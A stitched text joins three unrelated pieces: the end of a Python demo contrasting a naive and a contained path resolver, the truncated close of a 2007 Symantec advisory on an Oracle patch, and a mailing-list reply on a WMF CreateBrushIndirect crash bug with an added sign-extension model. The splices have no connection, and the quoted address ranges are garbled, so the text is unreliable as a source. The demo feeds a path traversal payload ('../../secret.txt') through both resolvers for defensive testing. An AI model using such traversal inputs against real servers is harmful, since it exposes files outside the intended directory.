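    if base_real not in target.parents:     # the base dir itself is not a file
        raise ValueError(f"escapes {base_real}: {name!r}")
    if target.suffix not in ALLOWED_SUFFIXES:
        raise ValueError(f"disallowed file type: {target.suffix!r}")
    return target


def blocked(base: str, name: str) -> bool:
    """True if safe_resolve() rejects `name`."""
    try:
        safe_resolve(base, name)
    except ValueError:
        return True
    return False


def demo() -> dict:
    """Build a throwaway tree and run a traversal payload through both
    resolvers.  Layout (constructed): <root>/app/views/week.php is the
    legitimate target, <root>/secret.txt is a file outside the view dir."""
    root = Path(tempfile.mkdtemp())
    views = root / "app" / "views"
    views.mkdir(parents=True)
    (views / "week.php").write_text("<?php echo 'week view'; ?>\n")
    (views / "notes.md").write_text("not a view\n")
    secret = root / "secret.txt"
    secret.write_text("outside the views directory\n")

    payload = "../../secret.txt"
    naive = os.path.normpath(naive_resolve(str(views), payload))
    return {
        "naive_path": naive,
        "naive_escapes": naive == str(secret),        # concatenation walks out
        "safe_ok": safe_resolve(str(views), "week.php").name,
        "blocked_traversal": blocked(str(views), payload),
        "blocked_absolute": blocked(str(views), str(secret)),  # '/' joins replace base
        "blocked_suffix": blocked(str(views), "notes.md"),
        "blocked_missing": blocked(str(views), "../../nope.txt"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:18s} {value}")
```

The containment test is done on resolved paths on purpose: a prefix comparison on the unresolved string (`path.startswith(base)`) is fooled by `base/../`, by a sibling directory whose name begins with the base name, and by symlinks inside the base that point outside it.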


Vendor Response:

The fix for this security vulnerability is included in Oracle's
January 2007 Critical Patch Update. The Critical Patch Update
advisory, which lists the versions affected and contains links
to more information and patches, is available at:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html

The main page for Oracle Critical Patch Updates and Security Alerts
is available at:
http://www.oracle.com/technology/deploy/security/alerts.htm


Recommendation:

Follow your organization's testing procedures before applying
patches or workarounds.  Symantec recommends that customers should
apply Oracle's update as soon as possible.


Oracle strongly recommends applying the Oracle Enterprise Manager
patches released with the January 2007 Critical Patch Update to all
instances affected by this problem.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


  CVE-2007-0222

---Symantec Vulnerability Research Advisory Information---

For questions about this advisory, or to report an error:
[EMAIL PROTECTED]

For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

Symantec Vulnerability Research Advisory Archive:
http://www.symantec.com/enterprise/research/archive.jsp

Symantec Vulnerability Research GPG Key:
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

-Symantec Product Advisory Information-

To Report a Security Vulnerability in a Symantec Product:
[EMAIL PROTECTED]

For general information on Symantec's Product Vulnerability
reporting and response:
http://www.symantec.com/security/

Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html

Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

---

Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted
as long as it is not edited in any way unless authorized by
Symantec Vulnerability Research. Reprinting the whole or part of
this alert in any medium other than electronically requires
permission from [EMAIL PROTECTED]

Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential 

Re: WMF CreateBrushIndirect vulnerability (DoS)

2007-01-16 Thread temp0_123

 The following WMF exploit appeared on milw0rm today:
 http://www.milw0rm.com/exploits/3111

Another 'old new thing' (i.e. plagiarism):

http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048530.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048547.html

 The vulnerability is a result of the WMF parser passing a value from the file 
 as
 a pointer argument to the CreateBrushIndirect function. The function
 dereferences the pointer and dies with an access violation.

 The value in the file is only 16-bit and it is sign extended into a 32-bit
 pointer. This means that we can only access addresses from 0x to
 0x and from 0x to 0x. Both of these ranges are always
 invalid, so the vulnerability is just a DoS.

 For more details and some commentary, see:
 http://determina.blogspot.com/2007/01/whats-wrong-with-wmf.html
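
The quoted post's DoS-only conclusion rests on one arithmetic fact: a 16-bit field sign-extended to 32 bits can only produce addresses in the bottom 32 KB or the top 32 KB of the address space, and neither region is ever user-mapped on 32-bit Windows (the lowest 64 KB is reserved; everything above the user/kernel split is kernel). The following is an added example, not code from the quoted post, milw0rm or the Determina write-up. It models only what the post states, a 16-bit value widened by sign extension into a pointer, derives the two reachable ranges, and checks them against the user-mode window. The record bytes are constructed and the field offset is an assumption for the demonstration, not the real WMF record layout.

```python
"""Why the sign-extended CreateBrushIndirect pointer can never be valid.

Added example; not code from the quoted post, milw0rm or the Determina
write-up.  The record bytes are constructed and the field offset is an
assumption, not the real WMF layout.
"""
import struct

# 32-bit Windows user-mode window with the default 2 GB split.  The lowest
# 64 KB is reserved so near-NULL pointers fault; above USER_HIGH is kernel.
# Under /3GB the split moves up, which does not bring either range below
# into reach.
USER_LOW = 0x00010000
USER_HIGH = 0x7FFEFFFF


def sext16(value: int) -> int:
    """Sign-extend a 16-bit quantity to a 32-bit unsigned address."""
    v = value & 0xFFFF
    return (v | 0xFFFF0000) if v & 0x8000 else v


def reachable_ranges() -> list:
    """Every address a sign-extended 16-bit value can produce, as two
    contiguous (lo, hi) ranges: one from non-negative values, one from
    negative values (the 0xFFFF0000 prefix pins those at the top)."""
    positive = [sext16(v) for v in range(0x0000, 0x8000)]
    negative = [sext16(v) for v in range(0x8000, 0x10000)]
    return [(min(positive), max(positive)), (min(negative), max(negative))]


def overlaps_user_space(lo: int, hi: int) -> bool:
    """True if [lo, hi] intersects the user-mode window."""
    return lo <= USER_HIGH and hi >= USER_LOW


def all_unreachable() -> bool:
    """True when no sign-extended pointer can land in user-mapped memory,
    i.e. the dereference always faults and the bug is a crash, not control."""
    return not any(overlaps_user_space(lo, hi) for lo, hi in reachable_ranges())


def pointer_from_record(record: bytes, offset: int) -> int:
    """Read the 16-bit little-endian field at `offset` as a parser that
    sign-extends it would (struct 'h' is signed) and widen it to 32 bits."""
    (raw,) = struct.unpack_from("<h", record, offset)
    return sext16(raw)


# Constructed record: a dummy header word followed by two 16-bit fields,
# one positive (0x1234) and one with the sign bit set (0x8000).
SAMPLE_RECORD = b"\x00\x00" + b"\x34\x12" + b"\x00\x80"

if __name__ == "__main__":
    for lo, hi in reachable_ranges():
        print(f"0x{lo:08X}-0x{hi:08X}  user-mapped? {overlaps_user_space(lo, hi)}")
    print("controllable dereference:", not all_unreachable())
```

Had the parser zero-extended the field instead, the reachable range would be 0x00000000 to 0x0000FFFF, still entirely inside the reserved low 64 KB, so the outcome would be the same; the sign extension only moves half of the candidates to the other unreachable end of memory.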